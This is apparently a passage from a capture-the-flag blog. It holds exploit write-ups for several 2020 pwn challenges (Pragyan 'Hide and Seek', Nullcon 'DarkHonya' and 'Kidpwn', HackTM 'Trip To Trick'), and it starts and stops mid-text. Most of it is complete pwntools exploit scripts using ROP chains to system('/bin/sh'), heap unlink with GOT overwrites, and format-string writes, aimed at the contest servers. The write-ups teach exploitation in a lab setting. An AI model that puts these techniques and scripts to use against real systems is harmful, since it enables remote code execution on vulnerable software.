        _IO_2_1_stdout_ += p64(0x0) # _freeres_list
        _IO_2_1_stdout_ += p64(0x0) # _freeres_buf
        _IO_2_1_stdout_ += p64(0x0) # __pad5
        _IO_2_1_stdout_ += p32(-0x1, signed=True) # _mode
        _IO_2_1_stdout_ += p32(0x0) # _unused2
        _IO_2_1_stdout_ += p64(0x0) # _unused2
        _IO_2_1_stdout_ += p64(0x0) # _unused2
        _IO_2_1_stdout_ += p64(LIBC+libc.symbols['_IO_2_1_stdout_']+0x200) # IO_helper_jumps
        STDERR = p64(LIBC+libc.symbols['_IO_2_1_stderr_']) # stderr
        STDOUT = p64(LIBC+libc.symbols['_IO_2_1_stdout_']) # stdout
        STDIN = p64(LIBC+libc.symbols['_IO_2_1_stdin_']) # stdin
        INPUT = _IO_2_1_stdout_+STDERR+STDIN+STDOUT+p64(0)*2*17+p64(0)+p64(LIBC+0x80650)+p64(LIBC+libc.symbols['system'])
        change_plane_name(-2, INPUT, False)
        r.interactive()
        r.close()
        return True
    except EOFError:
        r.close()
        return False

while not exploit():
    pass

References

[Pwn] Pragyan 2020 - Hide and Seek

2020-02-24T19:32:05.000Z

Hide and Seek

Description:
150pts
Solvers 11
Little Joe is lonely and has no one to play with him. So, his father built him a toy that can play hide and seek with him. However, Little Joe has lost his toy! Can you help him find it?
First solvers: OpenToAll
gps 1760946c1646ecf61192e545c2e9ac4a
libc-2.27.so 50390b2ae8aaa73c47745040f54e602f
nc ctf.pragyan.org 17000

Intro

This challenge had a very few solves, maybe because most people gave up after the hack. Another reason is probably because when trying to get a shell with system on the server it returns segmentation fault due to an alignment problem, this is an issue I also had in a previous ctf (CSAW 2019) and the fix is pretty simple as I will explain bellow.

Extracting info

Everything is enabled besides the stack canary:

$ checksec gpsu
[*] '/ctf/work/pwn/hideandseek/gpsu'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

From the file command we know that the binary is dynamically linked so we know it’s going to use a shared library of libc.

1
2

$ file gpsu
gpsu: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=2b53545d7df75c5dd56122820cf4806f2be749d3, for GNU/Linux 3.2.0, not stripped

Vulnerability

There is an obvious buffer overflow vulnerability in scanf, we also partially got a leak of the PIE address, which is necessary if we want to leak addresses from the GOT and to build a ropchain:

Writing the exploit

First thing we want to do is to get the pie address some numbers from it we already know because they’re not affected by the ALSR:

1	0xXXXXXXXX?000

The ones we already know is the last 3 which is 3 zeros, the “Xs” are leaked from the binary from those printfs but we are missing one number which is denoted with a “?”. The solution to this is to brute-force this number, a 4 bit bruteforce shouldn’t take much time even when connecting remotely.

So to form the pie address we can do this in python:

addr = '0xXXXXXXXX4000' # 8 bit brute-force (random guess of "?" with the number 4)
addr = list(addr)
indexes = [2,4,6,8,3,5,7,9]
for i in indexes:
  r.recvuntil('|')
  addr[i]=r.recv(1).decode()
  r.recvuntil('|')
  PIE = int(''.join(addr),16)

To brute-force every try we need to put this in a loop until we get the right address, if we succeed we can leak a libc address from the GOT:

ROP_CHAIN = p64(POPRDI) # pop rdi ; ret
ROP_CHAIN += p64(PIE+elf.got['fgets']) # fgets@got
ROP_CHAIN += p64(PIE+0x10e0) # r2 -> ?v sym.imp.puts
ROP_CHAIN += p64(MAIN) # return to main     
r.sendlineafter('---\n', b'A'*38+ROP_CHAIN)

The author didn’t release any libc file, because of this I used a very nice tool, from the leaked address, we can use the find command to get the right libc version:

$ /libc-database/find fgets 0x7f0916d25b20
http://ftp.osuosl.org/pub/ubuntu/pool/main/g/glibc/libc6_2.27-3ubuntu1_amd64.deb (id libc6_2.27-3ubuntu1_amd64)
$ /libc-database/download libc6_2.27-3ubuntu1_amd64
Getting libc6_2.27-3ubuntu1_amd64
  -> Location: http://mirrors.kernel.org/ubuntu/pool/main/g/glibc/libc6_2.27-3ubuntu1_amd64.deb
  -> Downloading package
  -> Extracting package
  -> Package saved to libs/libc6_2.27-3ubuntu1_amd64
$ cp /libc-database/libs/libc6_2.27-3ubuntu1_amd64/libc-2.27.so .

Next thing to do is to calculate the offsets:

FGETS = u64(r.recvuntil('\x7f').ljust(8,b'\x00'))
LIBC = FGETS-libc.symbols['fgets']
SYSTEM = LIBC+libc.symbols['system']
BINSH = LIBC+next(libc.search(b'/bin/sh\x00'))
log.info('FGETS 0x%x', FGETS)
log.info('LIBC 0x%x', LIBC)

Now its time to build a ropchain that executes system(“/bin/sh\x00”);, this is probably where most people got stuck, if we build a ropchain like this:

ROP_CHAIN = p64(POPRDI) # pop rdi ; ret
ROP_CHAIN += p64(BINSH)
ROP_CHAIN += p64(SYSTEM) # system(rdi=&/bin/sh);
ROP_CHAIN += p64(MAIN)
r.sendlineafter('---\n', b'A'*38+ROP_CHAIN)

Locally everything runs smoothly but when running at the server it always segfaults , basically our payload needs to be aligned within a 16 byte multiple, so to fix the alignment on the remote machine we can just add another rop instruction ret between BINSH and SYSTEM which in the end doesn’t do anything but will fix the alignment on the server machine:

ROP_CHAIN = p64(POPRDI) # pop rdi ; ret
ROP_CHAIN += p64(BINSH)
ROP_CHAIN += p64(RET) # ret  Won't work on server without this
ROP_CHAIN += p64(SYSTEM) # system(rdi=&/bin/sh);
ROP_CHAIN += p64(MAIN)
r.sendlineafter('---\n', b'A'*38+ROP_CHAIN)

With this we can get a shell remotely:

[+] Opening connection to ctf.pragyan.org on port 17000: Done
[*] 0x55df3d9c4000
...
[+] Opening connection to ctf.pragyan.org on port 17000: Done
[*] 0x556cd8114000
[*] FGETS 0x7f9e7ed7bb20
[*] LIBC 0x7f9e7ecfd000
[*] Switching to interactive mode
|5|   |6|   |d|   |1|
---   ---   ---   ---

     YOU ARE HERE      
          O            
---   ---   ---   ---
|5|   |c|   |8|   |1|
---   ---   ---   ---
$ cat bin/flag.txt
p_ctf{M@p_SPac3s_h3lP_pe0pl3_N@viG@t3}
$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)

The full exploit:

from pwn import *
host, port = "ctf.pragyan.org", "17000"
filename = "./gpsu"
elf = ELF(filename)
context.arch = 'amd64'

if not args.REMOTE:
    libc = elf.libc
else:
    libc = ELF('./libc-2.27.so')

def getConn():
    return process(filename) if not args.REMOTE else remote(host, port)

def get_PIE(proc):
    memory_map = open("/proc/{}/maps".format(proc.pid),"r").readlines()
    return int(memory_map[0].split("-")[0],16)

def debug(bp):
    script = ""
    PIE = get_PIE(r)
    PAPA = PIE
    for x in bp:
        script += "b *0x%x\n"%(PIE+x)
    gdb.attach(r,gdbscript=script)
context.terminal = ['tmux', 'new-window']
def exploit():
    global r
    try:
        r = getConn()

        if not args.REMOTE and args.GDB:
            debug([0x143b]) # 0x131a

        addr = '0xXXXXXXXX4000' # 4 bit bruteforce
        addr = list(addr)
        indexes = [2,4,6,8,3,5,7,9]
        for i in indexes:
            r.recvuntil('|')
            addr[i]=r.recv(1).decode()
            r.recvuntil('|')

        PIE = int(''.join(addr),16)
        RET = PIE+0x000000000000101a # ret
        POPRDI = PIE+0x00000000000014d3 # pop rdi ; ret
        MAIN = PIE+0x143c
        log.info('0x%x'% PIE)

        ROP_CHAIN = p64(POPRDI)
        ROP_CHAIN += p64(PIE+elf.got['fgets'])
        ROP_CHAIN += p64(PIE+0x10e0) # r2 -> ?v sym.imp.puts
        ROP_CHAIN += p64(MAIN)
        #context.log_level = 'debug'
        r.sendlineafter('---\n', b'A'*38+ROP_CHAIN)

        FGETS = u64(r.recvuntil('\x7f').ljust(8,b'\x00'))
        LIBC = FGETS-libc.symbols['fgets']
        SYSTEM = LIBC+libc.symbols['system']
        BINSH = LIBC+next(libc.search(b'/bin/sh\x00'))
        log.info('FGETS 0x%x', FGETS)
        log.info('LIBC 0x%x', LIBC)

        ROP_CHAIN = p64(POPRDI)
        ROP_CHAIN += p64(BINSH)
        ROP_CHAIN += p64(RET) # Won't work on server without this
        ROP_CHAIN += p64(SYSTEM)
        ROP_CHAIN += p64(MAIN)
        r.sendlineafter('---\n', b'A'*38+ROP_CHAIN)

        r.interactive()
        r.close()
        return True
    except EOFError:
        r.close()
        return False

while not exploit():
    pass

[Pwn] Nullcon 2020 - DarkHonya

2020-02-09T17:14:55.000Z

Description:
437 Points
nc pwn2.ctf.nullcon.net 5002
challenge
5b2f9b7d0b20ae7a694ae61c9de0c204
libc-2.23.so
8c0d248ea33e6ef17b759fa5d81dda9e

TLDR

Use off by one vulnerability to set next chunk prev_on_use bit to zero
Use unlink attack to write a global addr to the global pointer list
Edit global pointer list with exit_got and atoi_got
Use edit to overwrite atoi_got with printf
Use format string to leak libc
Edit exit_got with onegadget

Basic information

$ file challenge
challenge: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=6ea21ef679ff8d18a6bb9d2dc8914f2689871e20, stripped
$ checksec challenge
[*] '/ctf/work/pwn/darkHonya/challenge'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

As you can see, the program is 64-bit, Canary and Pie off, writeable GOT and NX is enabled.

Basic functions

There are 4 functions in the program. After some static analysis, the functions can be analysed as follows:

Name: Insert a name, data is stored in a global variable

int insertNameBss_4009FD()
{
  puts("----- BookStore -----");
  puts("finally! a customer, what is your name?");
  editString_400830(byte_6020A0);
  puts(byte_6020A0);
  return printf("Welcome %s\n", byte_6020A0);
}

Buy book: Allocates a chunk of size 0xF8, and records the corresponding chunk pointer in the bss segment (ptr list).

int buyAbook_40087C()
{
  int result; // eax
  char *v1; // [rsp+0h] [rbp-10h]
  int i; // [rsp+Ch] [rbp-4h]
  for ( i = 0; ptr[i]; ++i );
  if ( i > 15 )
    return puts("Next time bring a bag with you!");
  v1 = (char *)malloc(0xF8uLL);
  puts("Name of the book?");
  editString_400830(v1);
  result = i;
  ptr[i] = v1;
  return result;
}

Return a book: releases the allocated memory block according to the specified index.

__int64 freeBook_40093A()
{
  __int64 result; // rax
  unsigned int v1; // [rsp+Ch] [rbp-4h]

  puts("Which book do you want to return?");
  v1 = getInt_4007ED();
  if ( v1 > 0xF )
    puts("boy, you cannot return what you dont have!");
  free(ptr[v1]);
  result = v1;
  ptr[v1] = 0LL;
  return result;
}

Edit a book: Read data into the allocated memory according to the specified index and there is a null byte overflow situation here.

int __fastcall edit_4008EC(__int64 a1)
{
  unsigned int v2; // [rsp+Ch] [rbp-4h]

  v2 = getInt_4007ED();
  if ( v2 > 0xF )
    return puts("Writing in the air now?");
  puts("Name of the book?");
  return (unsigned __int64)editString_400830((char *)ptr[v2]);
}

The usual print function is not available.

Basic plan

Since the program itself has no print function, in order to get libc, our primary purpose is to construct a leak first. The basic idea is as follows:

Use unlink to modify ptr[0] to &ptr[0]-0x18
Use editing function to edit(0) and overflow ptr[1] to exit@got and ptr[2] to atoi@got
Use edit(2) to modify atoi@got to printf
Use format-string to leak a libc addr from the stack
Use edit(1) to modify exit@got to one_gadget

Off by one (null byte poisoning)

Now the idea with the null byte overflow is to set the prev_in_use bit of chunk B to zero, this bit is used to determine if the previous chunk is freed, if we free chunk B the free function is going to try to unlink chunk A, because it thinks its freed and present in doubly linked list, what defines the prev and next items in the list are the bk and fd pointers.

Understanding unlink

To understand well the unlink macro we need to understand its operations, the source code of unlink:

#define unlink(AV, P, BK, FD) {                                            
    FD = P->fd;                                   
    BK = P->bk;                                   
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))             
      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  
    else {                                    
        FD->bk = BK; // arbitrary write happens here                                  
        BK->fd = FD; // arbitrary write happens here                                  
        if (!in_smallbin_range (P->size)                      
            && __builtin_expect (P->fd_nextsize != NULL, 0)) {            
        if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)        
        || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    
          malloc_printerr (check_action,                      
                   "corrupted double-linked list (not small)",    
                   P, AV);                        
            if (FD->fd_nextsize == NULL) {                    
                if (P->fd_nextsize == P)                      
                  FD->fd_nextsize = FD->bk_nextsize = FD;             
                else {                                
                    FD->fd_nextsize = P->fd_nextsize;                 
                    FD->bk_nextsize = P->bk_nextsize;                 
                    P->fd_nextsize->bk_nextsize = FD;                 
                    P->bk_nextsize->fd_nextsize = FD;                 
                  }                               
              } else {                                
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;             
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;             
              }                                   
          }                                   
      }                                       
}

The operations of FD->bk = BK and BK->fd = FD is what we want to achieve.

Now taking a simple example, imagine we have 3 chunks.

Starting with FD = P->fd and BK = P->bk:

We execute the FD->bk=BK operation:

And finally the BK->fd=FD operation:

But there is a security check to bypass:

1
2
3

// fd bk
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
  malloc_printerr (check_action, "corrupted double-linked list", P, AV);

We can’t directly use this to modify for example a GOT entry but we can bypass this mechanism in a fake way.

First, we overwrite the FD pointer of nextchunk to fakeFD and the BK pointer of nextchunk to fakeBK, so in order to pass the verification we need:

fakeFD->bk == P <=> *(fakeFD+0x18) == P
fakeBK->fd == p <=> *(fakeBK+0x10) == P

When the two above restrictions are satisfied, you can enter unlink and perform the following operations:

fakeFD->bk = fakeBK <=> *(fakeFD + 0x18) = fakeBK
fakeBK->fd = fakeFD <=> *(fakeBK + 0x10) = fakeFD

Since this fakeFD->bk and fakeBK->fd must contain the address of P we need to find a place where the address of P is located and this place is at ptr list.

If we can change one of the pointers stored in the ptr list to a pointer located in the bss segment, we will be able to edit the entire list, after that, we just change the values in that list to write wherever we want.

Creating the exploit

First we create a chunk A and a chunk B, inside of chunk A we create a fake chunk with size of 0xf1 set chunk B prev_size equal to 0xf0.

1
2
3

add('A'*8)
add('B'*8)
edit(0,p64(0)+p64(0xf1)+p64(fakefd)+p64(fakebk)+'B'*0xd0 +p64(0xf0)) # create a fake chunk and overwrite prev_in_use

Before the null byte overflow:

After the null byte overflow:

The prev_size value is to bypass this security check:

1 2	if ( __builtin_expect ( chunksize ( P ) ! = prev_size ( next_chunk ( P )), 0 )) malloc_printerr ( "corrupted size vs. prev_size" );

We can check the first security check of FD->bk != P || BK->fd != P by doing this in gdb:

Lets trigger unlink by freeing chunk B:

free(1)

The content of global ptr will look like this:

Now we add got pointers to the list:

1	edit(0, p64(0x0)*3 + p64(0x602188) + p64(elf.got['exit']) + p64(elf.got['atoi']) + p64(0x602188))

Overwriting atoi@got at index 2 with printf:

1	edit(2, p64(elf.plt['printf']))

Now that atoi@got points to printf it no longer converts the input string to integers but we can still use printf to select the menu options because the return value of printf is the number of bytes printed:

r.sendline(' ') # 2 bytes sent so the option selected is 2 which is free
r.sendline('%lx') # leak libc with format string
r.recvuntil('Which book do you want to return?\n')
LEAK = int(r.recvline().rstrip(),16)
LIBC = LEAK -0x3c4963
log.info('LEAK 0x%x'%LEAK)
log.info('LIBC_BASE 0x%x'%LIBC)

Finally we edit exit@got with onegadget and we get a shell:

r.sendlineafter('5) Checkout!\n',' '*2)
r.sendline('') # send 1 byte to select edit option
r.sendafter('Name of the book?\n', p64(LIBC+0x4526a)) #overwrite exit@got
r.sendline('loool') # trigger exit aka one_gadget

The full exploit:

from pwn import *
host, port = "pwn2.ctf.nullcon.net", "5002"
filename = "./challenge"
elf = ELF(filename)
context.arch = 'amd64'

if not args.REMOTE:
    libc = elf.libc
else:
    libc = ELF('./libc-2.23.so')

GLOBAL = 0x6020A0
ptr = 0x6021A0
fakefd = ptr - 0x18
fakebk = ptr - 0x10
def getConn():
    return process(filename) if not args.REMOTE else remote(host, port)

def get_PIE(proc):
    memory_map = open("/proc/{}/maps".format(proc.pid),"rb").readlines()
    return int(memory_map[0].split("-")[0],16)

def debug(bp):
    script = ""
    PIE = get_PIE(r)
    PAPA = PIE
    for x in bp:
        script += "b *0x%x\n"%(x)
    gdb.attach(r,gdbscript=script)

def add(name):
    r.sendlineafter('5) Checkout!\n', '1')
    r.sendafter('Name of the book?\n', name)

def free(index):
    r.sendlineafter('5) Checkout!\n', '2')
    r.sendlineafter('Which book do you want to return?\n', str(index))  

def edit(index, name):
    r.sendlineafter('5) Checkout!\n', '3')
    r.sendline(str(index))
    r.sendafter('Name of the book?\n', name)


context.terminal = ['tmux', 'new-window']
r = getConn()
#r.interactive()

r.sendafter('finally! a customer, what is your name?\n', 'A'*0xf8)
add('A'*8)
add('B'*8)
#add('C'*8)
if not args.REMOTE and args.GDB:
    debug([0x400877]) # 0x400977,0x4008EC

edit(0,p64(0)+p64(0xf1)+p64(fakefd)+p64(fakebk)+'B'*0xd0 +p64(0xf0))
free(1)
#add('B'*8)
edit(0, p64(0x0)*3 + p64(0x602188) + p64(elf.got['exit']) + p64(elf.got['atoi']) + p64(0x602188))

edit(2, p64(elf.plt['printf']))
r.sendline(' ')
r.sendline('%lx')
r.recvuntil('Which book do you want to return?\n')
LEAK = int(r.recvline().rstrip(),16)
LIBC = LEAK -0x3c4963
log.info('LEAK 0x%x'%LEAK)
log.info('LIBC_BASE 0x%x'%LIBC)

r.sendlineafter('5) Checkout!\n',' '*2)
r.sendline('')
r.sendafter('Name of the book?\n', p64(LIBC+0x4526a))
r.sendline('loool')
#r.sendlineafter('5) Checkout!\n', '3')
#free(1)
#add('C'*8)
r.interactive()
r.close()

References

[Pwn] Nullcon 2020 - Kidpwn

2020-02-09T10:28:39.000Z

Description:
437 Points
nc pwn2.ctf.nullcon.net 5003
challenge
f115365f85409565c4bdf94690434aae
libc-2.23.so
8c0d248ea33e6ef17b759fa5d81dda9e

TLDR

Leak libc and pie addresses with format string
Overflow the last byte of ret addr and jump to another position in _libc_main to return to main
Change exit got with one gadget using format string

Binary security and architecture

$ checksec challenge
[*] '/ctf/work/pwn/kidpwn/challenge'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

No canary protection in this executable, relro is partial meaning we can overwrite the global offset table also we have another issue PIE is enabled.

1
2

$ file challenge
challenge: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=286d2ceaa8091a1b44bb0dcaf214d76c1d40bfee, stripped

Libc is a shared library (dynamically linked) and the architecture is x86-64.

Static analysis

Analysing the main we know we have a very simple program, it reads an integer from the input and creates a buffer in the stack using alloca, then it reads input from the stdin and stores it in this new created buffer then it prints it using printf.

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  void *v4; // rsp
  char s; // [rsp+0h] [rbp-70h]
  char v6; // [rsp+Fh] [rbp-61h]
  unsigned __int16 v7; // [rsp+6Eh] [rbp-2h]

  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  if ( unk_20105C )
  {
    v7 = 200;
  }
  else
  {
    if ( !fgets(&s, 100, stdin) )
      return 0xFFFFFFFFLL;
    v7 = atoi(&s);
  }
  v4 = alloca(16 * (((__int16)v7 + 30LL) / 0x10uLL));
  qword_201060 = (const char *)(16 * ((unsigned __int64)&v6 >> 4));
  read(0, (void *)(16 * ((unsigned __int64)&v6 >> 4)), v7);
  printf(qword_201060);
  if ( unk_20105C )
  {
    read(0, &s, 0LL);
    printf("JK, you lose!");
    _exit(0);
  }
  ++unk_20105C;
  return 0LL;
}

We can achieve a buffer overflow by causing an integer overflow in the operations inside alloca, by sending a negative number will cause alloca to create a smaller buffer in the stack than the inputted string:

else {
if ( !fgets(&s, 100, stdin) )
  return 0xFFFFFFFFLL;
  v7 = atoi(&s); // Negative values
}
v4 = alloca(16 * (((__int16)v7 + 30LL) / 0x10uLL)); // integer overflow in this operations causing a smaller buffer then the input that will come next
qword_201060 = (const char *)(16 * ((unsigned __int64)&v6 >> 4));
read(0, (void *)(16 * ((unsigned __int64)&v6 >> 4)), v7); // input will be bigger than the buffer

We can leak and get arbirtrary write by using a format string vulnerability in printf:

1	printf(qword_201060); // format string vulnerability

Plan

Leak libc and pie addresses
Find a way to return to main
Overwrite exit got address

Find a way to return to main

The most difficulty part of the challenge was to find a way to return to main, the pie is enabled so we can’t overwrite the global offset table or a global variable without leaking the PIE base address first.

My solution resolved on overflowing the last byte of the return address, in the c language after returning from the main function our program will jump into a location in __libc_start_main and execute exit with the value returned by the main function. If we modify the last byte we can prevent the execution of exit and rerun the code that the program used to call main in the beginning.

If you are used to using gdb you should have already noticed after the entry point there is a moment at _libc_start_main when you reach assembly instruction call rax the rax register contains a pointer to the begining of main.

We just need to find the right place to jump in _libc_start_main and since ASLR doesn’t affect the last 3 numbers of a libc address it’s completely fine to only overflow the last byte, after some debugging I found a byte that will work for this libc version (2.23) 0xa8:

1	r.send(" %27$lx"+'A'*0x80+'\xa8') # overwrite last byte of return address to jump to another _libc_main loc

Leaking pie and libc

This can be done with the format string vulnerability itself, the libc address will show up after we overflow the buffer, we also need to leak PIE because we need the offsets to the global offset table we can find a pie address at the 27th position of the stack:

“%lx” because we want to leak a 64 bit pointer:

1	r.send(" %27$lx"+'A'*0x80+'\xa8')

Then is just a matter of calculating the offsets(0x208a8,0x880) by using gdb:

output = r.recvuntil('\x7f')
LIBC = u64(output[-6:].ljust(8,'\x00'))-0x208a8 # libc leak
PIE = int(output[:14],16)-0x880 # geting pie

log.info("LIBC_BASE 0x%x"%u64(output[-6:].ljust(8,'\x00')))
log.info("LIBC_BASE 0x%x"%LIBC)
log.info("PIE 0x%x"%PIE)

ONE_GADGET = LIBC+0xf1147

Overwriting exit got address

I spent a lot of time here unnecessarily, to modify the address of exit_got we just need to modify last 1/2 bytes, instead I just modified everything spending a lot of time, while this is a good exercise is not very funny spending a lot of time figuring out a way to write a complete libc address during a competition, my solution resolved around sorting the HIGH,LOW addresses and do 3 writes:

ONE_GADGET = LIBC+0xf1147


# this is the reason why you should learn about format string libraries and saves you a lot of time 
WIN_LOW_0 = ONE_GADGET & 0xffff
WIN_LOW_1 = (ONE_GADGET & 0xffff0000) >> 16
WIN_HIGH = ONE_GADGET >> 32

addresses = [(WIN_LOW_0,1), (WIN_LOW_1,2), (WIN_HIGH,3)]
addresses.sort(key=lambda x: x[0])

log.info("ONE_GADGET 0x%x" % ONE_GADGET)
log.info("WIN_LOW_0 0x%x" % WIN_LOW_0)
log.info("WIN_LOW_1 0x%x" % WIN_LOW_1)
log.info("WIN_HIGH 0x%x" % WIN_HIGH)
log.info("GOT EXIT 0x%x" % (PIE+elf.got['_exit']))

getstr = {1:'%{}x%13$hn', 2:'%{}x%14$hn', 3:'%{}x%15$hn'}

s = ''
s += '%13$ln' # clears the already existing got address
s += getstr[addresses[0][1]].format(addresses[0][0]) 
s += getstr[addresses[1][1]].format(addresses[1][0]-addresses[0][0])
s += getstr[addresses[2][1]].format(addresses[2][0]-addresses[1][0])
s += ' '*(56-len(s))
s += p64(PIE+elf.got['_exit'])#'B'*8
s += p64(PIE+elf.got['_exit']+2)#'A'*8
s += p64(PIE+elf.got['_exit']+4)#'C'*8
s += "\n"
r.send(s)

Also a format string library could also be used but I’m very lazy in starting learning how to use one.

The full exploit code:

from pwn import *
host, port = "pwn2.ctf.nullcon.net", "5003"
filename = "./challenge"
elf = ELF(filename)
context.arch = 'amd64'

if not args.REMOTE:
    libc = elf.libc
else:
    libc = ELF('./libc-2.23.so')

def getConn():
    return process(filename) if not args.REMOTE else remote(host, port)

def get_PIE(proc):
    memory_map = open("/proc/{}/maps".format(proc.pid),"rb").readlines()
    return int(memory_map[0].split("-")[0],16)

def debug(bp):
    script = ""
    PIE = get_PIE(r)
    PAPA = PIE
    for x in bp:
        script += "b *0x%x\n"%(PIE+x)
    gdb.attach(r,gdbscript=script)
context.terminal = ['tmux', 'new-window']
r = getConn()
if not args.REMOTE and args.GDB:
    debug([0x9D8])

r.sendline('-1')

#context.log_level='debug'
r.send("  %27$lx"+'A'*0x80+'\xa8') # overwrite last byte of return address to jump to another _libc_main loc
output = r.recvuntil('\x7f')
LIBC = u64(output[-6:].ljust(8,'\x00'))-0x208a8 # libc leak
PIE = int(output[:14],16)-0x880 # geting pie

log.info("LIBC_BASE 0x%x"%u64(output[-6:].ljust(8,'\x00')))
log.info("LIBC_BASE 0x%x"%LIBC)
log.info("PIE 0x%x"%PIE)

ONE_GADGET = LIBC+0xf1147


# this is the reason why you should learn about format string libraries saves you a lot of time 
WIN_LOW_0 = ONE_GADGET & 0xffff
WIN_LOW_1 = (ONE_GADGET & 0xffff0000) >> 16
WIN_HIGH = ONE_GADGET >> 32

addresses = [(WIN_LOW_0,1), (WIN_LOW_1,2), (WIN_HIGH,3)]
addresses.sort(key=lambda x: x[0])

log.info("ONE_GADGET 0x%x" % ONE_GADGET)
log.info("WIN_LOW_0 0x%x" % WIN_LOW_0)
log.info("WIN_LOW_1 0x%x" % WIN_LOW_1)
log.info("WIN_HIGH 0x%x" % WIN_HIGH)
log.info("GOT EXIT 0x%x" % (PIE+elf.got['_exit']))

getstr = {1:'%{}x%13$hn', 2:'%{}x%14$hn', 3:'%{}x%15$hn'}

s = ''
s += '%13$ln' # clears the already existing got address
s += getstr[addresses[0][1]].format(addresses[0][0]) 
s += getstr[addresses[1][1]].format(addresses[1][0]-addresses[0][0])
s += getstr[addresses[2][1]].format(addresses[2][0]-addresses[1][0])
s += ' '*(56-len(s))
s += p64(PIE+elf.got['_exit'])#'B'*8
s += p64(PIE+elf.got['_exit']+2)#'A'*8
s += p64(PIE+elf.got['_exit']+4)#'C'*8
s += "\n"
r.send(s)
r.interactive()
r.close()

[Pwn] HackTM 2020 - Trip To Trick

2020-02-05T15:46:42.000Z

Trip To Trick

Description:
492 Points
Author:
NextLine
Flag Path: /home/pwn/flag
nc 138.68.67.161 20006
trip_to_trick
c6fd4ef7c34c528668edd62914a79602
libc.so.6
2fb0d6800d4d79ffdc7a388d7fe6aea0

TLDR

Set _IO_2_1_stdin_->file->_IO_BUF_END = STDIN+0x2000
Next scanf will have full control of IO_FILE structures
STDOUT->vtable = _IO_helper_jumps & STDOUT->flags=0x0 to bypass vtable checker and mprotect of _IO_file_jumps
In libc-2.29 vtables are writeable again so we can control rip by changing the value of _IO_helper_jumps->__finish
Set _IO_helper_jumps->__finish=setcontext+0x35 to obtain stack pivot.
Construct a ropchain to open/read/print the file

Challenge

I didn’t solve this challenge during ctf time, but I spent a lot of time trying to do it, perhaps in the end I had the opportunity to speak with a guy who solved named stan from discord which told me his solution.

I eventually ended up implementing it, I learned a lot of new things about the IO_FILE struct, huge thanks to him for leading me into the right path in this challenge.

Information extraction

File

1
2

$ file trip_to_trick
trip_to_trick: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=9ba40c68c917a91e11558eceaffd3e006531a6d9, for GNU/Linux 3.2.0, not stripped

Security

$ checksec trip_to_trick
[*] '/ctf/work/pwn/TripToTrick/trip_to_trick'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

Static analysis

Main function

int __cdecl main(int argc, const char **argv, const char **envp)
{
  _QWORD *v4; // [rsp+18h] [rbp-18h]
  __int64 v5; // [rsp+20h] [rbp-10h]
  unsigned __int64 v6; // [rsp+28h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  v5 = 0LL;
  sandbox(argc, argv, envp);
  nohack();
  main_init(argc);
  printf("gift : %p\n", &system);
  printf("1 : ");
  __isoc99_scanf("%llx %llx", &v4, &v5);
  *v4 = v5;
  printf("2 : ");
  __isoc99_scanf("%llx %llx", &v4, &v5);
  *v4 = v5;
  fclose(stdout);
  fclose(stdin);
  fclose(stderr);
  return 0;
}

There’s not much in the main from it we can get:

free libc leak
two arbitrary writes (scanfs)
fclose(stdout), fclose(stdin) and fclose(stderr) (important for the exploit).

sandbox function

__int64 sandbox()
{
  __int64 v1; // [rsp+8h] [rbp-8h]

  v1 = seccomp_init(0LL);
  if ( !v1 )
  {
    puts("seccomp error");
    exit(0);
  }
  seccomp_rule_add(v1, 2147418112LL, 15LL, 0LL);
  seccomp_rule_add(v1, 2147418112LL, 3LL, 0LL);
  seccomp_rule_add(v1, 2147418112LL, 10LL, 0LL);
  seccomp_rule_add(v1, 2147418112LL, 9LL, 0LL);
  seccomp_rule_add(v1, 2147418112LL, 12LL, 0LL);
  seccomp_rule_add(v1, 2147418112LL, 2LL, 0LL);
  seccomp_rule_add(v1, 2147418112LL, 0LL, 0LL);
  seccomp_rule_add(v1, 2147418112LL, 1LL, 0LL);
  seccomp_rule_add(v1, 2147418112LL, 60LL, 0LL);
  seccomp_rule_add(v1, 2147418112LL, 231LL, 0LL);
  if ( (int)seccomp_load(v1) < 0 )
  {
    seccomp_release(v1);
    puts("seccomp error");
    exit(0);
  }
  return seccomp_release(v1);
}

The author uses seccomp to only allow a few syscalls:

sym.imp.seccomp_rule_add(iVar2, 0x7fff0000, 0xf, 0); # SCMP_ACT_ALLOW  sys_rt_sigreturn
sym.imp.seccomp_rule_add(iVar2, 0x7fff0000, 3, 0); # sys_close
sym.imp.seccomp_rule_add(iVar2, 0x7fff0000, 10, 0); # sys_mprotect
sym.imp.seccomp_rule_add(iVar2, 0x7fff0000, 9, 0); # sys_mmap
sym.imp.seccomp_rule_add(iVar2, 0x7fff0000, 0xc, 0); # sys_brk
sym.imp.seccomp_rule_add(iVar2, 0x7fff0000, 2, 0); # sys_open
sym.imp.seccomp_rule_add(iVar2, 0x7fff0000, 0, 0); # sys_read
sym.imp.seccomp_rule_add(iVar2, 0x7fff0000, 1, 0); # sys_write
